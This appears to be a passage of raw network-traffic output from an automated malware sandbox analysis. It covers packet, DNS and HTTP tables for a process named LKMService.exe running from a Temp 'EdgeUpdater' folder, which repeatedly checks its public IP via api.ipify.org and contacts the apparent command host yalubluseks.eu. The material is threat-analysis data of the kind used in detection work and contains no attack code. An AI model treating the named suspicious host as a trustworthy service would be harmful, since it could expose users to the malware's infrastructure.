                Oct 3, 2024 03:30:09.507781029 CEST52973443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:09.509047031 CEST52973443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:09.509063005 CEST44352973104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:09.997025967 CEST44352973104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:09.999450922 CEST52973443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:09.999483109 CEST44352973104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:10.128746986 CEST44352973104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:10.129092932 CEST52973443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:10.129115105 CEST44352973104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:10.546870947 CEST44352973104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:10.546994925 CEST44352973104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:10.547056913 CEST52973443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:10.547586918 CEST52973443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:10.547863007 CEST5297280192.168.2.6104.26.12.205
                Oct 3, 2024 03:30:10.548875093 CEST5297480192.168.2.6104.26.12.205
                Oct 3, 2024 03:30:10.552923918 CEST8052972104.26.12.205192.168.2.6
                Oct 3, 2024 03:30:10.552978039 CEST5297280192.168.2.6104.26.12.205
                Oct 3, 2024 03:30:10.553636074 CEST8052974104.26.12.205192.168.2.6
                Oct 3, 2024 03:30:10.553709030 CEST5297480192.168.2.6104.26.12.205
                Oct 3, 2024 03:30:10.553853989 CEST5297480192.168.2.6104.26.12.205
                Oct 3, 2024 03:30:10.558665037 CEST8052974104.26.12.205192.168.2.6
                Oct 3, 2024 03:30:11.029313087 CEST8052974104.26.12.205192.168.2.6
                Oct 3, 2024 03:30:11.030446053 CEST52975443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:11.030519009 CEST44352975104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:11.030605078 CEST52975443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:11.030908108 CEST52975443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:11.030926943 CEST44352975104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:11.138171911 CEST5297480192.168.2.6104.26.12.205
                Oct 3, 2024 03:30:11.515908957 CEST44352975104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:11.518234968 CEST52975443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:11.518271923 CEST44352975104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:11.928117990 CEST52975443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:11.928174973 CEST44352975104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:12.613482952 CEST44352975104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:12.819411993 CEST44352975104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:12.819484949 CEST52975443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:12.924635887 CEST44352975104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:12.924837112 CEST44352975104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:12.925184965 CEST52975443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:12.925234079 CEST44352975104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:12.925255060 CEST52975443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:12.925390005 CEST52975443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:12.926429033 CEST52976443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:12.926479101 CEST44352976104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:12.926582098 CEST52976443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:12.926928043 CEST52976443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:12.926948071 CEST44352976104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:13.417453051 CEST44352976104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:13.419969082 CEST52976443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:13.419991016 CEST44352976104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:13.556924105 CEST44352976104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:13.557271004 CEST52976443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:13.557286024 CEST44352976104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:13.847722054 CEST44352976104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:13.847810030 CEST44352976104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:13.848015070 CEST52976443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:13.849457026 CEST52976443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:19.985565901 CEST5297480192.168.2.6104.26.12.205
                Oct 3, 2024 03:30:19.990988970 CEST8052974104.26.12.205192.168.2.6
                Oct 3, 2024 03:30:20.111726046 CEST8052974104.26.12.205192.168.2.6
                Oct 3, 2024 03:30:20.112410069 CEST52978443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:20.112462997 CEST44352978104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:20.112528086 CEST52978443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:20.112812042 CEST52978443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:20.112823009 CEST44352978104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:20.325249910 CEST5297480192.168.2.6104.26.12.205
                Oct 3, 2024 03:30:20.573211908 CEST44352978104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:20.575303078 CEST52978443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:20.575331926 CEST44352978104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:20.712165117 CEST44352978104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:20.712521076 CEST52978443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:20.712553978 CEST44352978104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:21.088345051 CEST44352978104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:21.088495970 CEST44352978104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:21.089267969 CEST52978443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:21.089272022 CEST5297480192.168.2.6104.26.12.205
                Oct 3, 2024 03:30:21.089303017 CEST44352978104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:21.089334011 CEST52978443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:21.089428902 CEST52978443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:21.096163988 CEST8052974104.26.12.205192.168.2.6
                Oct 3, 2024 03:30:21.199723005 CEST8052974104.26.12.205192.168.2.6
                Oct 3, 2024 03:30:21.200520039 CEST52979443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:21.200532913 CEST44352979104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:21.200997114 CEST52979443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:21.200997114 CEST52979443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:21.201021910 CEST44352979104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:21.326164007 CEST5297480192.168.2.6104.26.12.205
                Oct 3, 2024 03:30:21.664623976 CEST44352979104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:21.666445971 CEST52979443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:21.666476965 CEST44352979104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:21.799110889 CEST44352979104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:21.799452066 CEST52979443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:21.799463987 CEST44352979104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:22.284816980 CEST44352979104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:22.284913063 CEST44352979104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:22.284969091 CEST52979443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:22.285293102 CEST52979443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:22.285703897 CEST52980443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:22.285758018 CEST44352980104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:22.285819054 CEST52980443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:22.286120892 CEST52980443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:22.286139965 CEST44352980104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:22.739016056 CEST44352980104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:22.740807056 CEST52980443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:22.740842104 CEST44352980104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:22.864048958 CEST44352980104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:22.864362001 CEST52980443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:22.864397049 CEST44352980104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:23.143086910 CEST44352980104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:23.143171072 CEST44352980104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:23.143340111 CEST52980443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:23.143701077 CEST52980443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:53.153734922 CEST5297480192.168.2.6104.26.12.205
                Oct 3, 2024 03:30:53.168704033 CEST8052974104.26.12.205192.168.2.6
                Oct 3, 2024 03:30:53.273907900 CEST8052974104.26.12.205192.168.2.6
                Oct 3, 2024 03:30:53.274662018 CEST52981443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:53.274746895 CEST44352981104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:53.274883986 CEST52981443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:53.275260925 CEST52981443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:53.275302887 CEST44352981104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:53.325186968 CEST5297480192.168.2.6104.26.12.205
                Oct 3, 2024 03:30:53.742993116 CEST44352981104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:53.745119095 CEST52981443192.168.2.6104.21.54.163
                Oct 3, 2024 03:30:53.745138884 CEST44352981104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:53.864661932 CEST44352981104.21.54.163192.168.2.6
                Oct 3, 2024 03:30:53.918947935 CEST52981443192.168.2.6104.21.54.163
                TimestampSource PortDest PortSource IPDest IP
                Oct 3, 2024 03:26:13.099467993 CEST5114953192.168.2.61.1.1.1
                Oct 3, 2024 03:26:13.106211901 CEST53511491.1.1.1192.168.2.6
                Oct 3, 2024 03:26:13.625304937 CEST6344553192.168.2.61.1.1.1
                Oct 3, 2024 03:26:13.658992052 CEST53634451.1.1.1192.168.2.6
                Oct 3, 2024 03:26:55.708014011 CEST5361094162.159.36.2192.168.2.6
                Oct 3, 2024 03:26:56.209670067 CEST53633701.1.1.1192.168.2.6
                Oct 3, 2024 03:27:20.029453993 CEST5064953192.168.2.61.1.1.1
                Oct 3, 2024 03:27:20.068134069 CEST53506491.1.1.1192.168.2.6
                Oct 3, 2024 03:27:56.030666113 CEST6462753192.168.2.61.1.1.1
                Oct 3, 2024 03:27:56.037426949 CEST53646271.1.1.1192.168.2.6
                Oct 3, 2024 03:29:21.546463966 CEST5420453192.168.2.61.1.1.1
                Oct 3, 2024 03:29:21.553247929 CEST53542041.1.1.1192.168.2.6
                Oct 3, 2024 03:29:57.045437098 CEST6089953192.168.2.61.1.1.1
                Oct 3, 2024 03:29:57.052650928 CEST53608991.1.1.1192.168.2.6
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Oct 3, 2024 03:26:13.099467993 CEST192.168.2.61.1.1.10x4c6eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                Oct 3, 2024 03:26:13.625304937 CEST192.168.2.61.1.1.10x590bStandard query (0)yalubluseks.euA (IP address)IN (0x0001)false
                Oct 3, 2024 03:27:20.029453993 CEST192.168.2.61.1.1.10x8114Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                Oct 3, 2024 03:27:56.030666113 CEST192.168.2.61.1.1.10x204Standard query (0)57.122.6.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                Oct 3, 2024 03:29:21.546463966 CEST192.168.2.61.1.1.10x7765Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                Oct 3, 2024 03:29:57.045437098 CEST192.168.2.61.1.1.10x616aStandard query (0)57.122.6.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Oct 3, 2024 03:26:13.106211901 CEST1.1.1.1192.168.2.60x4c6eNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                Oct 3, 2024 03:26:13.106211901 CEST1.1.1.1192.168.2.60x4c6eNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                Oct 3, 2024 03:26:13.106211901 CEST1.1.1.1192.168.2.60x4c6eNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                Oct 3, 2024 03:26:13.658992052 CEST1.1.1.1192.168.2.60x590bNo error (0)yalubluseks.eu104.21.54.163A (IP address)IN (0x0001)false
                Oct 3, 2024 03:26:13.658992052 CEST1.1.1.1192.168.2.60x590bNo error (0)yalubluseks.eu172.67.140.92A (IP address)IN (0x0001)false
                Oct 3, 2024 03:27:20.068134069 CEST1.1.1.1192.168.2.60x8114No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                Oct 3, 2024 03:27:20.068134069 CEST1.1.1.1192.168.2.60x8114No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                Oct 3, 2024 03:27:20.068134069 CEST1.1.1.1192.168.2.60x8114No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                Oct 3, 2024 03:27:56.037426949 CEST1.1.1.1192.168.2.60x204Name error (3)57.122.6.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                Oct 3, 2024 03:29:21.553247929 CEST1.1.1.1192.168.2.60x7765No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                Oct 3, 2024 03:29:21.553247929 CEST1.1.1.1192.168.2.60x7765No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                Oct 3, 2024 03:29:21.553247929 CEST1.1.1.1192.168.2.60x7765No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                Oct 3, 2024 03:29:57.052650928 CEST1.1.1.1192.168.2.60x616aName error (3)57.122.6.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                • yalubluseks.eu
                • api.ipify.org
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.649715172.67.74.15280800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:26:13.177228928 CEST63OUTGET / HTTP/1.1
                Host: api.ipify.org
                Connection: Keep-Alive
                Oct 3, 2024 03:26:13.622821093 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:26:13 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc9248eccf61851-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33
                Oct 3, 2024 03:26:14.953176022 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:26:15.060959101 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:26:15 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc92497cb2c1851-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33
                Oct 3, 2024 03:26:46.951035023 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:26:47.076143980 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:26:47 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc9255fc9bf1851-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33
                Oct 3, 2024 03:26:48.118313074 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:26:48.225191116 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:26:48 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc925671e321851-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.652918104.26.12.20580800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:27:20.077756882 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:27:20.607021093 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:27:20 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc926314dcc42c4-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33
                Oct 3, 2024 03:27:21.905555010 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:27:22.023324966 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:27:21 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc9263a5adf42c4-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.652923104.26.12.20580800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:27:54.260922909 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:27:54.723021984 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:27:54 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc92706b80e41ad-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.652925104.26.12.20580800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:27:55.733268976 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.652926104.26.12.20580800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:28:01.478065968 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:28:01.942761898 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:01 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc92733c9357cf0-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.652928104.26.12.20580800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:28:02.887124062 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:28:03.366909981 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:03 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc9273c9bba1784-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                6192.168.2.652932104.26.12.20580800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:28:24.469759941 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:28:24.945278883 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:24 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc927c398fac420-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                7192.168.2.652934104.26.12.20580800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:28:25.983685970 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:28:26.439889908 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:26 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc927ccecbc7ca6-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                8192.168.2.652937104.26.12.20580800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:28:28.540184975 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:28:29.004704952 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:28 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc927dcf8cd42af-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                9192.168.2.652939104.26.12.20580800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:28:29.955442905 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:28:30.578412056 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:30 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc927e5ce1e8c15-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33
                Oct 3, 2024 03:28:30.646933079 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:30 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc927e5ce1e8c15-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                10192.168.2.652942104.26.12.20580800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:28:34.303497076 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:28:34.764616013 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:34 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc92800ff148cb9-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                11192.168.2.652944104.26.12.20580800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:28:36.885751009 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:28:37.350682020 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:37 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc928111d55c44f-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                12192.168.2.652948104.26.12.20580800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:28:42.036510944 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:28:42.510267973 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:42 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc9283148924289-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                13192.168.2.652950104.26.12.20580800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:28:43.450025082 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:28:43.895359039 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:43 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc9283a0baa8c51-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                14192.168.2.652953104.26.12.20580800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:28:47.849694967 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:28:48.327817917 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:48 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc92855ad8043a7-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                15192.168.2.652955104.26.12.20580800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:28:49.268539906 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:28:49.733843088 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:28:49 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc9285e8c2c727a-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                16192.168.2.652958104.26.12.20580800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:29:21.559252977 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:29:22.024835110 CEST227INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:29:21 GMT
                Content-Type: text/plain
                Content-Length: 11
                Connection: keep-alive
                Vary: Origin
                CF-Cache-Status: DYNAMIC
                Server: cloudflare
                CF-RAY: 8cc92928587b5e68-EWR
                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: 8.46.123.33


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                17192.168.2.652960104.26.12.20580800C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                TimestampBytes transferredDirectionData
                Oct 3, 2024 03:29:23.032233953 CEST39OUTGET / HTTP/1.1
                Host: api.ipify.org
                Oct 3, 2024 03:29:23.514765978 CEST227INHTTP/1.1 200 OK
